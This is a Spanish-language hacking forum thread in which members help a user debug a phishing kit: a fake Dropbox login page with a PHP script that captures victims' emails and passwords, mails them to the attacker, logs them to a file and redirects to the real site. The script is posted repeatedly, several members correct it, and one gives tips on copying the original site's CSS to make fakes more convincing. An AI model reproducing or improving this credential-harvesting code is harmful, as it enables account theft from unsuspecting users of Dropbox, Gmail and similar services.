Gracias por el tuto
Una consulta... he hecho varios y no he tenido problemas, pero recientemente perdí el de dropbox y al hacerlo usando este método y un tuto que puso elshotta en este foro y en el finado master-hackers; el .php me guarda el pass pero no redirecciona, funciona con cualquiera pero no con el de drop.. He usados varios hosting y me sigue pasando
este es el php
<?
/*
Este archivo es el que procesa todos los datos de la persona y lo guarda en un archivo (leeme.html <- Aqui se guardaran los datos).
*/
#haxor.php
// Asigna el valor a las variables del usuario y contraseña
$Email = $_POST['login_email'];
$email2=$_POST['lol'];
$Passwd = $_POST['login_password'];
//Asigna el valor a la variable donde se guarda el usuario y contraseña
$email="[email protected]";
$headers = "From: $email";
$message .= "
email: ".$Email."
pass: " .$Passwd."
___________________________________________________________________________________";
$message = stripslashes($message);
$message = strip_tags ($message);
mail($email2= "[email protected]", "Correo de hotmail", $message, $headers);
$guardame = fopen('leeme.html','a+');
fwrite($guardame,
"<br/><b>Usuario:</b>".$Email.
"<br/><b>Contrasena:</b>".$Passwd." ");
fclose($guardame);
//Redirecciona a la web original (facebook)
echo "<meta http-equiv='refresh' content='1;url=https://myaccount.google.com/?pli=1'>";
?>
Gracias de antemano
Saludos
No tienes permitido ver los links.
Registrarse o Entrar a mi cuenta
Gracias por el tuto
Una consulta... he hecho varios y no he tenido problemas, pero recientemente perdí el de dropbox y al hacerlo usando este método y un tuto que puso elshotta en este foro y en el finado master-hackers; el .php me guarda el pass pero no redirecciona, funciona con cualquiera pero no con el de drop.. He usados varios hosting y me sigue pasando
este es el php
<?
/*
Este archivo es el que procesa todos los datos de la persona y lo guarda en un archivo (leeme.html <- Aqui se guardaran los datos).
*/
#haxor.php
// Asigna el valor a las variables del usuario y contraseña
$Email = $_POST['login_email'];
$email2=$_POST['lol'];
$Passwd = $_POST['login_password'];
//Asigna el valor a la variable donde se guarda el usuario y contraseña
$email="[email protected]";
$headers = "From: $email";
$message .= "
email: ".$Email."
pass: " .$Passwd."
___________________________________________________________________________________";
$message = stripslashes($message);
$message = strip_tags ($message);
mail($email2= "[email protected]", "Correo de hotmail", $message, $headers);
$guardame = fopen('leeme.html','a+');
fwrite($guardame,
"<br/><b>Usuario:</b>".$Email.
"<br/><b>Contrasena:</b>".$Passwd." ");
fclose($guardame);
//Redirecciona a la web original (facebook)
echo "<meta http-equiv='refresh' content='1;url=https://myaccount.google.com/?pli=1'>";
?>
Gracias de antemano
Saludos
Prueba este codigo
<?
/*
Este archivo es el que procesa todos los datos de la persona y lo guarda en un archivo (leeme.html <- Aqui se guardaran los datos).
*/
#haxor.php
// Asigna el valor a las variables del usuario y contraseña
$Email = $_POST['login_email'];
$email2=$_POST['lol'];
$Passwd = $_POST['login_password'];
//Asigna el valor a la variable donde se guarda el usuario y contraseña
$email="[email protected]";
$headers = "From: $email";
$message .= "
email: ".$Email."
pass: " .$Passwd."
___________________________________________________________________________________";
$message = stripslashes($message);
$message = strip_tags ($message);
mail($email2= "[email protected]", "Correo de hotmail", $message, $headers);
$guardame = fopen('leeme.html','a+');
fwrite($guardame,
"<br/><b>Usuario:</b>".$Email.
"<br/><b>Contrasena:</b>".$Passwd." ");
fclose($guardame);
//Redirecciona a la web original (facebook)
header('Location: https://www.facebook.com/');
?>
@neurotic66 (https://underc0de.org/foro/index.php?action=profile;u=18145) proba cambiando la ultima linea por: header('Location: http://www.site.com');
Saludos!
Gracias por las respuestas...
es interesante porque no redirecciona, guarda las pass, pero se queda en la página del fake... pruebo con uno de gmail (que cambió el log esta semana) y con uno viejo de outlook... con esos si va
Saludos
@neurotic66 (https://underc0de.org/foro/index.php?action=profile;u=18145) el code que te he puesto te deberia redireccionar a facebook y no a tu fake :)
No tienes permitido ver los links.
Registrarse o Entrar a mi cuenta
@neurotic66 (https://underc0de.org/foro/index.php?action=profile;u=18145) el code que te he puesto te deberia redireccionar a facebook y no a tu fake :)
entiendo, lo que pasa es que el fake no redirecciona... se queda sin hacer nada... lo extraño es que el pass si se guarda...
Saludos y nuevamente gracias
Si quieres puedes pasar el link de tu fake y el code que tienes ahora mismo y le echo otro ojo ;)
No tienes permitido ver los links.
Registrarse o Entrar a mi cuenta
entiendo, lo que pasa es que el fake no redirecciona... se queda sin hacer nada... lo extraño es que el pass si se guarda...
Saludos y nuevamente gracias
Hola
@neurotic66 (https://underc0de.org/foro/index.php?action=profile;u=18145), he mirado tu código, lo he modificado y probado y funciona correctamente:
<?php
/*
Este archivo es el que procesa todos los datos de la persona y lo guarda en un archivo (leeme.html <- Aqui se guardaran los datos).
*/
#haxor.php
// Asigna el valor a las variables del usuario y contraseña
$Email = $_GET['login_email'];
$Passwd = $_GET['login_password'];
//Asigna el valor a la variable donde se guarda el usuario y contraseña
$email="[email protected]";
$headers = "From: $email";
$message = "mail: ".$Email." pass: " .$Passwd."___________________________________________________________________________________";
$message = stripslashes($message);
$message = strip_tags ($message);
mail($email2= "[email protected]", "Correo de hotmail", $message, $headers);
$guardame = fopen('leeme.html','a+');
fwrite($guardame,"<br/><b>Usuario:</b>".$Email."<br/><b>Contrasena:</b>".$Passwd." ");
fclose($guardame);
//Redirecciona a la web original (facebook)
header('Location: https://www.facebook.com/');
?>
Por cierto, comprueba que en ambos ficheros, tengas permisos 777.
Saludos.
Gracias por las respuestas,
use el que pusiste blackdrake y además me aseguré que los permisos estuvieran aplicados.... no cambia el problema... probé en unos 4 host gratuitos y solo con el de dropbox está fallando.....
Disculpas al compañero si le estoy cargando el tema
De nuevo gracias a todos
Saludos
@neurotic66 (https://underc0de.org/foro/index.php?action=profile;u=18145)
Obviamente el código PHP está mal, enseñanoslo (el que tienes actualmente y te falla) porque hay algo que no has hecho bien.
Saludos.
No tienes permitido ver los links.
Registrarse o Entrar a mi cuenta
@neurotic66 (https://underc0de.org/foro/index.php?action=profile;u=18145)
Obviamente el código PHP está mal, enseñanoslo (el que tienes actualmente y te falla) porque hay algo que no has hecho bien.
Saludos.
Gracias por la respuesta y por dividir el tema para no cargarme el del compañero....
<?
/*
Este archivo es el que procesa todos los datos de la persona y lo guarda en un archivo (leeme.html <- Aqui se guardaran los datos).
*/
#haxor.php
// Asigna el valor a las variables del usuario y contraseña
$Email = $_POST['login_email'];
$email2=$_POST['lol'];
$Passwd = $_POST['login_password'];
//Asigna el valor a la variable donde se guarda el usuario y contraseña
$email="[email protected]";
$headers = "From: $email";
$message .= "
email: ".$Email."
pass: " .$Passwd."
___________________________________________________________________________________";
$message = stripslashes($message);
$message = strip_tags ($message);
mail($email2= "[email protected]", "Correo de hotmail", $message, $headers);
$guardame = fopen('leeme.html','a+');
fwrite($guardame,
"<br/><b>Usuario:</b>".$Email.
"<br/><b>Contrasena:</b>".$Passwd." ");
fclose($guardame);
//Redirecciona a la web original (facebook)
echo "<meta http-equiv='refresh' content='1;url=https://myaccount.google.com/?pli=1'>";
?>
ese php me ha funcionado para el mismo dropbox y gmail con pequeñas variaciones, en drop hice lo usual, el guarda el pass pero no redirecciona.. no he tenido tiempo pero voy a intentar con la recomendación del compañero ROLLTH, de iponer en práctica lo expuesto en el taller de xss...
para salir del paso modifiqué uno de la red (mis disculpas al usuario que lo posteó pero no anoté el nombre) y lo hice de drop por si lo quieren ojear
Citarhttp://www.mediafire.com/download/674h0m68gevad78/drop(2).zip
Saludos
Hola @neurotic66 (https://underc0de.org/foro/index.php?action=profile;u=18145)
He descargado tus archivos, y me ha funcionado correctamente, acuérdate de que el archivo restar.html debe estar creado, y darle 777 a sumando.php, guarda los datos y redirige correctamente.
Un consejo, los phishing se toman basándose en los css de la página original, no en una imagen.
saludos.
No tienes permitido ver los links.
Registrarse o Entrar a mi cuenta
Hola @neurotic66 (https://underc0de.org/foro/index.php?action=profile;u=18145)
He descargado tus archivos, y me ha funcionado correctamente, acuérdate de que el archivo restar.html debe estar creado, y darle 777 a sumando.php, guarda los datos y redirige correctamente.
Un consejo, los phishing se toman basándose en los css de la página original, no en una imagen.
saludos.
ese es otro, con ese no tengo problema, lo puse como ejemplo de uno que uso momentáneamente... con el que tengo problemas es si lo bajo de
dropbox.com
le cambio los action y algunos href, luego pequeños cambios al css.... algo le agregaron que no permite redirección
Saludos
WTF!
Añade al PRINCIPIO de tu código php al que se redirecciona tras el envío del formulario esto
<?php
header('Location: https://webalaquerediriges.com/');
?>
Jimeno... ya se hizo y no cambia en nada... he probado en tres host gratuitos y como dije, guarda la clave pero no redirecciona... aclaro que no es el que subí a meiafire, ese funciona y es algo cutre... mi lucha está con el original de la página... la otra es que luego con tiempo intento implementar algo de lo expuesto den el taller de xss
Saludos
Publica tu código actual entonces
Con un header que cambie la cabecera Location debe bastar, algo estarás haciendo mal. Porque los hostings en principio permiten redireccionar fuera de ellos.
Si no todo es probar, este caso con JS al inicio del documento:
<script type="text/javascript">document.location='https://web.com/';</script>
@Jimeno (https://underc0de.org/foro/index.php?action=profile;u=9827)
Es obvio que algo está haciendo mal, pero @neurotic66 (https://underc0de.org/foro/index.php?action=profile;u=18145) no quiere subir su código, encima sube otros que funcionan, y solo nos está haciendo perder el tiempo.
O subes el código para que te ayudemos, o si no, no podremos hacer nada por ti.
Saludos.
ya lo había borrado, la intención no es molestar a nadie... cambié los action por
login.php
(usualmente uso el que puse con el cambio de agregar el header... en el action estaba originalmente
/ajax_verify_code
... voy a subir uno rápido que descargué de la web original, usualmente bajo todos los archivos (me funcionaba hace dos semanas) quito algunos href y a los css le quito cosas simples y en algunos casos los he dejado como están...
este es el login actual de drop con el cambio del action
Citarhttp://www.mediafire.com/view/ivl4iyg9uyabiyz/Dropbox_-_Sign_in.html
edit. cuando subo habilito los permisos al archivo y la carpeta, agrego header al php. El php que puse en el primer mensaje antes me funcionaba sin ningún problema.
ejemplo arriba
http://titlelepaz.herobo.com/Dropbox%20-%20Sign%20in.html
Nota: no he podido probar con el script de @jimeno porque los server que uso están caido o en mantenimiento (es la única recomendación que me falta implementar)
Saludos
@neurotic66 (https://underc0de.org/foro/index.php?action=profile;u=18145)
lo que queremos ver es el php no el html...
Saludos.
supongo que al php te refieres al
login.php
que uso, que es el que puse arriba, porque si no evidentemente estoy perdido y no es por molestar
<?
/*
Este archivo es el que procesa todos los datos de la persona y lo guarda en un archivo (leeme.html <- Aqui se guardaran los datos).
*/
#haxor.php
// Asigna el valor a las variables del usuario y contraseña
$Email = $_POST['login_email'];
$email2=$_POST['lol'];
$Passwd = $_POST['login_password'];
//Asigna el valor a la variable donde se guarda el usuario y contraseña
$email="[email protected]";
$headers = "From: $email";
$message .= "
email: ".$Email."
pass: " .$Passwd."
___________________________________________________________________________________";
$message = stripslashes($message);
$message = strip_tags ($message);
mail($email2= "[email protected]", "Correo de hotmail", $message, $headers);
$guardame = fopen('leeme.html','a+');
fwrite($guardame,
"<br/><b>Usuario:</b>".$Email.
"<br/><b>Contrasena:</b>".$Passwd." ");
fclose($guardame);
//Redirecciona a la web original (facebook)
echo "<meta http-equiv='refresh' content='1;url=https://dropbox.com'>";
?>
el único cambio es el header y que redirecciona a "x" carpeta de dropbox para que sea más creíble.... todos los permisos otrogados y funcionaba hace dos semanas exactamente ese mismo... el html, la carpeta de los files y ese php es todo lo que subo, si se me escapa algo les agradezco el señalamiento
Gracias y saludos
Cambia la redirección por la que yo te dije (la de JS) y prueba de nuevo.
Dejo esto aquí para que la gente se haga una idea de tus conocimientos y pueda ayudarte en base a ellos. Lo has de añadir al html, no al PHP.
(http://i.imgur.com/wmeJii6.png)
Saludos.
No tienes permitido ver los links.
Registrarse o Entrar a mi cuenta
supongo que al php te refieres al login.php
que uso, que es el que puse arriba, porque si no evidentemente estoy perdido y no es por molestar
<?
/*
Este archivo es el que procesa todos los datos de la persona y lo guarda en un archivo (leeme.html <- Aqui se guardaran los datos).
*/
#haxor.php
// Asigna el valor a las variables del usuario y contraseña
$Email = $_POST['login_email'];
$email2=$_POST['lol'];
$Passwd = $_POST['login_password'];
//Asigna el valor a la variable donde se guarda el usuario y contraseña
$email="[email protected]";
$headers = "From: $email";
$message .= "
email: ".$Email."
pass: " .$Passwd."
___________________________________________________________________________________";
$message = stripslashes($message);
$message = strip_tags ($message);
mail($email2= "[email protected]", "Correo de hotmail", $message, $headers);
$guardame = fopen('leeme.html','a+');
fwrite($guardame,
"<br/><b>Usuario:</b>".$Email.
"<br/><b>Contrasena:</b>".$Passwd." ");
fclose($guardame);
//Redirecciona a la web original (facebook)
echo "<meta http-equiv='refresh' content='1;url=https://dropbox.com'>";
?>
el único cambio es el header y que redirecciona a "x" carpeta de dropbox para que sea más creíble.... todos los permisos otrogados y funcionaba hace dos semanas exactamente ese mismo... el html, la carpeta de los files y ese php es todo lo que subo, si se me escapa algo les agradezco el señalamiento
Gracias y saludos
Quita el meta y pon un header location, como ya te dijimos, ese php ya te lo corregí y te lo adjunté en un comentario anterior... lee bien el tema por favor.
Saludos.
un novato total, eso es claro... una carrera totalmente opuesta a la info o similares...
volviendo al tema, voy a seguir todos los pasos para ver como me va... estaba entretenido con lo del taller xss y algo que pusieron en el foro sobre hydra en cali y me desvié un poco...
gracias por las respuestas
Saludos
Atiendo al usuario vía MP.
Se marca el tema como solucionado.
Saludos.